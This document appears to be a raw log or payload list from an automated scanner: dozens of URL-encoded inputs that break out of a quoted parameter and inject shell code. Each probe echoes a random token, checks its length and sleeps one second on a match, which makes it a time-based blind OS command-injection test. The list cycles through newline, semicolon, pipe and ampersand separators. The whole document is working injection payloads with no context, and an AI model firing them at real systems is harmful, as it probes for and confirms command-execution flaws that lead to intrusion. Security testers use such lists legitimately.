+%27%0A%20str%3D%24%28echo%20ZSGSGJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20// +%27%0A%20str%3D%24%28echo%20ZSGSGJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20// +%27%0A%20str%3D%24%28echo%20ZSGSGJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20// +%27%0A%20str%3D%24%28echo%20ZSGSGJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20// +%27%0A%20str%3D%24%28echo%20ZSGSGJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20// +%27%0A%20str%3D%24%28echo%20ZSGSGJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20// +%27%3B%20str%3D%24%28echo%20ERVJHE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C +%27%3B%20str%3D%24%28echo%20ERVJHE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C +%27%3B%20str%3D%24%28echo%20ERVJHE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C +%27%3B%20str%3D%24%28echo%20ERVJHE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C +%27%3B%20str%3D%24%28echo%20ERVJHE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C +%27%3B%20str%3D%24%28echo%20ERVJHE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C +%27%3B%20str%3D%24%28echo%20ERVJHE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C +%27%3B%20str%3D%24%28echo%20ERVJHE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C +%27%3B%20str%3D%24%28echo%20ERVJHE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C +%27%7C%20%5B%201%20-ne%20%24%28echo%20SUCHGF%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C +%27%7C%20%5B%202%20-ne%20%24%28echo%20SUCHGF%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C +%27%7C%20%5B%203%20-ne%20%24%28echo%20SUCHGF%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C +%27%7C%20%5B%204%20-ne%20%24%28echo%20SUCHGF%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C +%27%7C%20%5B%205%20-ne%20%24%28echo%20SUCHGF%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C +%27%7C%20%5B%206%20-ne%20%24%28echo%20SUCHGF%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C +%27%7C%20%5B%207%20-ne%20%24%28echo%20SUCHGF%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C +%27%7C%20%5B%208%20-ne%20%24%28echo%20SUCHGF%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C +%27%7C%20%5B%209%20-ne%20%24%28echo%20SUCHGF%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BJMMJX%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BJMMJX%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BJMMJX%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BJMMJX%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BJMMJX%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BJMMJX%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BJMMJX%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BJMMJX%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BJMMJX%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C +%27%0A%20str%3D%24%28echo%20FPLFHR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C +%27%0A%20str%3D%24%28echo%20FPLFHR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C +%27%0A%20str%3D%24%28echo%20FPLFHR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C +%27%0A%20str%3D%24%28echo%20FPLFHR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C +%27%0A%20str%3D%24%28echo%20FPLFHR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C +%27%0A%20str%3D%24%28echo%20FPLFHR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C +%27%0A%20str%3D%24%28echo%20FPLFHR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C +%27%0A%20str%3D%24%28echo%20FPLFHR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C +%27%0A%20str%3D%24%28echo%20FPLFHR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C +%27%3B%20str%3D%24%28echo%20HLDNYH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26 +%27%3B%20str%3D%24%28echo%20HLDNYH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26 +%27%3B%20str%3D%24%28echo%20HLDNYH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26 +%27%3B%20str%3D%24%28echo%20HLDNYH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26 +%27%3B%20str%3D%24%28echo%20HLDNYH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26 +%27%3B%20str%3D%24%28echo%20HLDNYH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26 +%27%3B%20str%3D%24%28echo%20HLDNYH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26 +%27%3B%20str%3D%24%28echo%20HLDNYH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26 +%27%3B%20str%3D%24%28echo%20HLDNYH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26 +%27%7C%20%5B%201%20-ne%20%24%28echo%20PSPAPE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26 +%27%7C%20%5B%202%20-ne%20%24%28echo%20PSPAPE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26 +%27%7C%20%5B%203%20-ne%20%24%28echo%20PSPAPE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26 +%27%7C%20%5B%204%20-ne%20%24%28echo%20PSPAPE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26 +%27%7C%20%5B%205%20-ne%20%24%28echo%20PSPAPE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26 +%27%7C%20%5B%206%20-ne%20%24%28echo%20PSPAPE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26 +%27%7C%20%5B%207%20-ne%20%24%28echo%20PSPAPE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26 +%27%7C%20%5B%208%20-ne%20%24%28echo%20PSPAPE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26 +%27%7C%20%5B%209%20-ne%20%24%28echo%20PSPAPE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26 +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VZETTM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26 +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VZETTM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26 +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VZETTM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26 +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VZETTM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26 +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VZETTM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26 +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VZETTM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26 +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VZETTM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26 +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VZETTM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26 +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VZETTM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26 +%27%0A%20str%3D%24%28echo%20GIPRGX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26 +%27%0A%20str%3D%24%28echo%20GIPRGX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26 +%27%0A%20str%3D%24%28echo%20GIPRGX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26 +%27%0A%20str%3D%24%28echo%20GIPRGX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26 +%27%0A%20str%3D%24%28echo%20GIPRGX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26 +%27%0A%20str%3D%24%28echo%20GIPRGX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26 +%27%0A%20str%3D%24%28echo%20GIPRGX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26 +%27%0A%20str%3D%24%28echo%20GIPRGX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26 +%27%0A%20str%3D%24%28echo%20GIPRGX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26 +%27%3B%20str%3D%24%28echo%20ASBPAS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C +%27%3B%20str%3D%24%28echo%20ASBPAS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C +%27%3B%20str%3D%24%28echo%20ASBPAS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C +%27%3B%20str%3D%24%28echo%20ASBPAS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C +%27%3B%20str%3D%24%28echo%20ASBPAS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C +%27%3B%20str%3D%24%28echo%20ASBPAS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C +%27%3B%20str%3D%24%28echo%20ASBPAS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C +%27%3B%20str%3D%24%28echo%20ASBPAS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C +%27%3B%20str%3D%24%28echo%20ASBPAS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C +%27%7C%20%5B%201%20-ne%20%24%28echo%20FNEGWH%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C +%27%7C%20%5B%202%20-ne%20%24%28echo%20FNEGWH%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C +%27%7C%20%5B%203%20-ne%20%24%28echo%20FNEGWH%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C +%27%7C%20%5B%204%20-ne%20%24%28echo%20FNEGWH%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C +%27%7C%20%5B%205%20-ne%20%24%28echo%20FNEGWH%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C +%27%7C%20%5B%206%20-ne%20%24%28echo%20FNEGWH%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C +%27%7C%20%5B%207%20-ne%20%24%28echo%20FNEGWH%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C +%27%7C%20%5B%208%20-ne%20%24%28echo%20FNEGWH%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C +%27%7C%20%5B%209%20-ne%20%24%28echo%20FNEGWH%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WSMVBW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WSMVBW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WSMVBW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WSMVBW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WSMVBW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WSMVBW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WSMVBW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WSMVBW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WSMVBW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C +%27%0A%20str%3D%24%28echo%20TNNFNL%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C +%27%0A%20str%3D%24%28echo%20TNNFNL%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C +%27%0A%20str%3D%24%28echo%20TNNFNL%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C +%27%0A%20str%3D%24%28echo%20TNNFNL%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C +%27%0A%20str%3D%24%28echo%20TNNFNL%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C +%27%0A%20str%3D%24%28echo%20TNNFNL%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C +%27%0A%20str%3D%24%28echo%20TNNFNL%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C +%27%0A%20str%3D%24%28echo%20TNNFNL%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C +%27%0A%20str%3D%24%28echo%20TNNFNL%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C +%27%3B%20str%3D%24%28echo%20WSGIYR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527 +%27%3B%20str%3D%24%28echo%20WSGIYR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527 +%27%3B%20str%3D%24%28echo%20WSGIYR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527 +%27%3B%20str%3D%24%28echo%20WSGIYR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527 +%27%3B%20str%3D%24%28echo%20WSGIYR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527 +%27%3B%20str%3D%24%28echo%20WSGIYR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527 +%27%3B%20str%3D%24%28echo%20WSGIYR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527 +%27%3B%20str%3D%24%28echo%20WSGIYR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527 +%27%3B%20str%3D%24%28echo%20WSGIYR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527 +%27%7C%20%5B%201%20-ne%20%24%28echo%20QPTCDE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527 +%27%7C%20%5B%202%20-ne%20%24%28echo%20QPTCDE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527 +%27%7C%20%5B%203%20-ne%20%24%28echo%20QPTCDE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527 +%27%7C%20%5B%204%20-ne%20%24%28echo%20QPTCDE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527 